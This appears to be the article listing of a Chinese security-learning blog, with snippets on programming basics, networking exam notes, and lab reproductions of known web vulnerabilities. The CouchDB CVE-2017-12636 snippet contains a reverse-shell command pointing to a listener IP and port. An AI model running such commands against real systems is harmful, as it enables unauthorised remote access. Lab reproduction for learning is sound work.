- 博客(53)
- 收藏
- 关注
RSS订阅原创 网安快速入门之JS基础
JavaScript(简称“JS”)是一种具有函数优先的轻量级,解释型或即时编译型的编程语言。它以其作为开发Web页面的脚本语言而闻名,但也被广泛应用于非浏览器环境中。JavaScript是一种基于原型编程、多范式的动态脚本语言,支持面向对象、命令式、声明式和函数式编程范式。简言而知: JS -> 利用脚本,让网站动起来基本语法var x = 10;// 输出 10var y = 20;// 输出 20,因为 y 的作用域是全局的。
2025-01-21 23:26:40
768
原创 Java快速入门之类、对象、方法
1. 类和对象1.1 类和对象的理解客观存在的事物皆为对象 ,Java中万物皆对象。类类的理解类是对象的数据类型,类是具有相同属性和行为的一组对象的集合,相当于现实生活中一类具有共同属性和行为的事物的抽象类的组成属性:指事物的特征,例如:手机的品牌之类行为:指事物能执行的操作,例如:打电话类和对象的关系类是对事物的一种描述,对象则为具体存在的事物1.2 类的定义类的组成是由属性和行为两部分组成属性:在类中通过成员变量来体现(类中方法外的变量)
2025-01-21 23:20:57
869
原创 java快速入门之判断与循环
循环语句可以在满足循环条件的情况下,反复执行某一段代码,这段被重复执行的代码被称为循环体语句,当反复 执行这个循环体时,需要在合适的时候把循环判断条件修改为false,从而结束循环,否则循环将一直执行下去,形 成死循环。其次,和case依次比较,一旦有对应的值,就会执行相应的语句,在执行的过程中,遇到break就会结 束。最后,如果所有的case都和表达式的值不匹配,就会执行default语句体部分,然后程序结束掉。小明快要期末考试了,小明爸爸对他说,会根据他不同的考试成绩,送他不同的礼物,
2025-01-12 17:47:01
1070
原创 网安入门之MySQL后端基础
查询 想要查询到的结果(数据列的名称) 从哪儿来(从哪个数据表操作) 资源归属(数据表的名称) where 限制条件(key=value)INSERT INTO 表名(字段名称1, 字段名称2) VALUES (字段值1,字段值2)#可以不用对记录中每一个字段都赋值,但是字段名称和字段值数量要一致UPDATE 表名 SET 字段 = '值' WHERE 条件DELETE FROM 表名 WHERE 条件#delete没有输入字段,是因为我们是将整条记录一起删除的**AND**
2025-01-05 21:04:47
1206
原创 Java的基础概念(二)
因为byte的取值范围是小的,int的取值范围是大的,在底层进行了隐式转换,不需要我们额外写代码单独实现,是可以直接赋值。变量i里面的值会自动提升为long类型的,最终的结果其实就是两个long相加,那么最终的result是long类型的。在这个过程中,有字符串参与的,所以做的是拼接操作,产生一个新的字符串"3abc2"。在这个过程中,有字符串参与的,所以做的是拼接操作,产生一个新的字符串"1abc"在这个过程中,有字符串参与的,所以做的是拼接操作,产生一个新的字符串"3abc"。
2025-01-02 22:10:57
834
原创 网安入门之PHP后端基础
在 PHP 中,变量是用来存储数据的标识符,可以是任何类型的值,例如字符串、整数、数组等。1. 使用**$**定义变量所有变量必须以美元符号()开头。后面紧跟变量的名称,这个名称可以是一个有效的标识符。赋值时,使用等号将值赋给变量。示例php// 定义变量 $name,并赋值为字符串 "Alice"$age = 25;// 定义变量 $age,并赋值为整数 25// 定义变量 $isStudent,并赋值为布尔值 true?2. 变量名称规则(1) 变量名称不能以数字开头。
2024-12-30 22:16:21
1022
原创 Java的基础概念(一)
只要用双引号引起来的,不管里面的内容是什么,不管里面有没有内容,都是字符串类型的字面量。如果是多个单词,那么从第二个单词开始,首字母大写,比如:firstName、maxAge。如果要定义 一个小数类型的变量,不知道选择哪种数据类型了,默认使用double。e+38表示是乘以10的38次方,同样,e-45表示乘以10的负45次方。如果要定义 一个整数类型的变量,不知道选择哪种数据类型了,默认使用int。如果是多个单词,那么每一个单词首字母都需要大写。在定义变量的时候,要根据实际的情况来选择不同类型的变量。
2024-12-23 20:12:45
1000
原创 网安入门|前端基础之Html_css基础
超文本:比文本更牛掰的东西标记:给文本内容打上标签语言:计算机语言,通常拥有一些固定语法通俗的说,超文本标记语言的产物:HTML文件,它的主要功能是:存在固定的语法和标签,编辑者可以给文本打上对应的标签,让它有着比文本更牛掰的效果和功能。
2024-12-20 22:39:24
1125
原创 Java的入门
在掌握了Java SE的基础上,你可以进一步学习Java EE,了解如何开发企业级应用程序。Java EE提供了丰富的API和规范,可以帮助你构建大型、分布式、多层的企业级应用。它是Java技术的核心,包含了开发Java应用程序所需的所有工具和资源,所以。:Java是一种高级的、通用的、解释型的、面向对象的编程语言,由Sun Microsystems(现为Oracle公司的一部分)于1995年推出。:Java程序可以在任何安装Java虚拟机(JVM)的平台上运行,实现了“一次编写,处处运行”的理念。
2024-12-16 13:25:08
681
原创 在Docker部署DVWA
最后,打开firefox验证一下,输入127.0.0.1:8001,看到下图则证明镜像运行成功。docker ps 查看正在运行的镜像,如下图可以看到端口映射则证明镜像运行成功。下面可以看到下面界面,直接复制粘贴命令即可成功配置。可以看到搜索出了大量镜像,我们随便选一个,我这里选了第一个。然后就可以对DVWA进行配置了。如下图所示,则DVWA部署成功。看到如下图所示,则docker加速器配置成功。此时docker已经全部部署成功!弹出版本信息即安装成功!然后直接复制粘贴就行!如下图所示则镜像下载成功。
2024-07-06 16:42:29
1074
原创 条件竞争之文件上传
一、条件竞争介绍条件竞争,在程序员日常的Web应用开发中,通常不如其他漏洞受到的关注度高。因为普遍的共识是,条件竞争是不可靠的,大多数时候只能靠代码审计来识别发现,而依赖现有的工具或技术很难在黑盒灰盒中识别并进行攻击。即便该漏洞很难被发现,也仍然有很多企业曾被曝出相关漏洞,例如星巴克咖啡、小密圈的App 产品等。今天要讲解的条件竞争漏洞仅限于Web应用之中。
2024-01-07 02:13:06
1659
原创 实战|验证码突破思路
漏洞成因:由于逻辑设计缺陷,可绕过验证,比如直接删除COOKIE或验证码参数可绕过、当验证不通过清空session时,验证码参数值为空时绕过等。测试方法:抓包,删除验证码字段,查看是否可以成功发送抓包,正常流程下,记录验证码后的数据包,替换目标包中内容,直接发送,查看是否可以直接绕过验证码案例:Step1.输入正确账户信息和错误验证码,登录时抓包Step2.删除COOKIEStep3.客户端登陆成功。
2024-01-06 01:24:14
6744
原创 Couchdb 任意命令执行漏洞(CVE-2017-12636)
command = rb"""sh -i >& /dev/tcp/192.168.217.128/5566 0>&1""" # 这里的ip为监听机ip也就是攻击机。target = 'http://192.168.217.128:5984' # 目标ip。如上图所示即反弹shell成功!三、构造payload。
2024-01-01 20:36:21
874
原创 Couchdb 垂直权限绕过漏洞(CVE-2017-12635)
应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12636是一个任意命令执行漏洞,我们可以通过config api修改couchdb的配置query_server,这个配置项在设计、执行view的时候将被运行。影响版本:小于 1.7.0 以及 小于 2.1.1。密码:password。
2024-01-01 17:38:24
983
原创 Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。由于AJP协议设计存在缺陷导致内部相关的属性可控,攻击者可以构造属性值,使未授权的用户读取服务器任意文件获得敏感信息,甚至可以进行远程代码执行漏洞的利用。Adobe ColdFusion 8、9版本中皆存在一处目录穿越漏洞。管理员密码获取到了,就可以正常玩耍了!三、输入admin初始化环境。五、漏洞利用,读取管理员密码。
2024-01-01 14:54:13
829
原创 apache httpd多后缀解析漏洞复现
由于管理员的错误配置, AddHandler application/x-httpd-php .php,在有多个后缀的情况下,只要一个文件含有.php后缀的文件即将被识别成PHP文件,没必要是最后一个后缀。Apache Httpd支持一个文件拥有多个后缀,不同的后缀执行不同的命令,也就是说当我们上传的文件中只要后缀名含有php,该文件就可以被解析成php文件,利用Apache httpd这个特性,就可以绕过上传文件的白名单。如上图所示即getshell成功!
2023-12-30 05:53:59
993
原创 AppWeb认证绕过漏洞(CVE-2018-8715)
六、漏洞存在特征(Gigest)四、抓包获取sesion。三、构造payload。五、修改数据包、认证头。
2023-12-30 04:00:09
971
原创 Apereo CAS 4.1 反序列化命令执行漏洞
最后的效果是这样的,笔者电脑问题,没继续了。四、生成加密后的payload。如上图所示,则表明漏洞存在。
2023-12-30 02:45:59
816
原创 Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)复现
如上图所示即反弹shell成功!二、用docker搭建漏洞环境。然后进入admin目录登录。查看一下目录,发现创建成功。最后点击它,触发命令执行。五、getshell。
2023-12-29 04:08:20
1160
6
原创 软考中级信息安全工程师:网络攻击原理与常用方法之缓冲区溢出攻击
网络攻击是指恶意分子通过利用计算机网络中的漏洞和弱点,侵入系统或者获取未授权的访问权限,从而造成数据泄露、服务拒绝、系统崩溃等危害。缓冲区溢出攻击是网络攻击中最常见和危险的一种攻击方式之一。它利用程序中的缓冲区漏洞,向缓冲区写入超出其预设大小的数据,导致程序行为异常,甚至获得系统控制权。缓冲区溢出攻击原理缓冲区溢出攻击利用程序在处理数据时没有足够的校验或边界检查,从而使得攻击者可以向程序的缓冲区写入比其容量更大的数据。攻击者通常通过发送大量数据,超出了程序预设的缓冲区大小,多余的数据会溢出到相邻内存
2023-08-04 11:05:59
668
原创 软考中级信息安全工程师:计算机网络之internet服务
从网页浏览到即时通讯、社交媒体和云计算,各种Internet服务使得我们可以在互联网上获取信息、与他人交流,享受娱乐和购物的便利。Internet服务是指通过互联网向用户提供的各种服务和资源。Internet服务的基础是互联网,它将全球的计算机和网络设备连接在一起,形成一个庞大的信息交流和资源共享平台。云计算通过将资源和服务提供给用户,让用户能够根据需要访问和使用这些资源,而无需拥有和管理这些资源的实际物理硬件。Internet服务是指通过全球范围的互联网向用户提供的各种服务和资源。
2023-08-04 10:58:05
207
原创 软考中级信息安全工程师:计算机网络之子网划分
子网掩码的长度由CIDR表示法表示,例如,/24表示24位的子网掩码。计算子网掩码的方法是:将子网掩码长度的前缀位设为1,后面的位数设为0,然后将二进制数转换为十进制数。了解子网掩码、网络地址和广播地址的计算方法,能够帮助我们正确划分子网,合理利用IP地址空间,优化网络性能,提高网络管理效率,并增强网络的安全性。计算广播地址的方法是:将子网掩码中主机部分全置为1,然后与网络地址进行逻辑或操作。计算网络地址的方法是:将IP地址的主机部分置为0,即将主机部分全部设为0,得到网络地址。
2023-08-04 10:55:19
308
原创 软考中级信息安全工程师:计算机网络之IP地址
为了简化IPv6地址的书写,可以去除每组数字前导的0,并且允许一次性省略连续的0组,用“::”表示。IPv4地址被分为网络地址和主机地址两部分,网络地址标识了设备所在的网络,而主机地址则用于标识同一网络中的具体设备。为了解决这个问题,IPv6(Internet Protocol version 6)被提出,它采用128位的地址空间,使得IP地址的数量大大增加,可以满足更多的网络连接需求。IPv6的地址空间非常庞大,远远超过IPv4的地址空间,为互联网的未来发展提供了充足的地址资源。
2023-08-04 10:51:26
229
原创 软考中级信息安全工程师:计算机网络之TCP/IP协议族
当谈及计算机网络,TCP/IP协议族是现代网络通信的核心。它是一组相互关联的协议,用于在全球范围内实现数据的传输和交换。
2023-08-03 00:54:04
198
原创 软考信息安全工程师:计算机网络之OSI/RM七层模型
每一层都有特定的功能,通过协作,它们实现了数据在网络中的传输和处理,从物理媒介上传输原始比特流到应用程序之间的通信。数据链路层(Data Link Layer): 数据链路层建立在物理层之上,它负责在直连的节点之间传输数据帧。网络层(Network Layer): 网络层的主要任务是在整个网络中找到合适的路径,使数据包能够从源地址传输到目的地址。表示层(Presentation Layer): 表示层主要负责数据的格式转换,确保在不同系统上的应用程序之间能够正确地解释数据。
2023-08-02 00:11:10
415
原创 软考中级信息安全工程师:计算机网络之计算机网络分类
在实际网络中,通常会采用多种拓扑结构的组合,以便充分利用每种拓扑的优势,同时弥补其缺点。当谈到计算机网络时,我们通常指的是连接在一起的计算机和设备之间的通信系统。计算机网络是现代信息社会的重要基础设施,通过对其分类了解,我们可以更好地理解和应用不同类型的网络,以满足不同的通信需求。在星型拓扑中,每个设备都直接连接到一个中央设备,通常是交换机或集线器。这个中央设备充当数据的集线器,负责将从一个设备发送的数据包传输给目标设备。在环型拓扑中,每个设备都与其两侧的设备相连,形成一个封闭的环路。
2023-07-30 23:43:18
354
原创 软考中级信息安全工程师:硬件基础之校验码
校验码是一串额外的数据,通过对原始数据进行特定的计算生成。在数据传输或存储过程中,校验码附加在原始数据后面,一起传输或存储。接收方可以利用校验码来检测是否有数据发生了错误或者被损坏。
2023-07-29 13:00:26
379
原创 软考中级信息安全工程师
当谈论计算机硬件基础时,磁盘存储是一个重要的主题。磁盘存储是一种非易失性存储技术,用于在计算机系统中长期保存数据。在本文中,我们将介绍磁盘存储的基本原理、不同类型的磁盘以及其在计算机中的应用。
2023-07-28 10:28:41
458
原创 软考中级信息安全工程师:硬件基础之主存
主存作为计算机系统的核心组成部分,在计算机的运行过程中发挥着至关重要的作用。它为CPU提供了快速访问数据的通道,使计算机能够高效地执行各种任务。在不断发展的计算机领域,主存技术也在不断地进步和创新,为我们带来更强大、更高效的计算机体验。通过深入理解主存的工作原理和结构,我们可以更好地优化计算机系统,提高计算机性能,满足日益增长的计算需求。
2023-07-27 03:11:57
616
1
原创 软考中级信息安全工程师:硬件基础之寻址方式
寻址方式是计算机内存访问的基础,不同的寻址方式在不同的场景下发挥着重要作用。本文将深入探讨寻址方式的基本原理和不同类型的寻址方式,帮助读者更好地理解计算机内存的访问机制。基址寻址方式是通过将指令中的地址与基址寄存器中的内容相加,得到实际的内存地址。相对寻址方式是将指令中给出的地址与当前指令地址相加(或相减),得到实际的内存地址。间接寻址方式是通过指令中给出的地址,找到一个包含实际地址的存储单元,然后再根据该实际地址进行数据存取。变址寻址方式是通过将指令中的地址与变址寄存器中的内容相加,得到实际的内存地址。
2023-07-26 00:31:17
732
1
竞赛规程·2023- 2024学年广东省职业院校学生专业技能大赛嵌人式系统应用开发赛项竞赛规程
2024-12-14
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人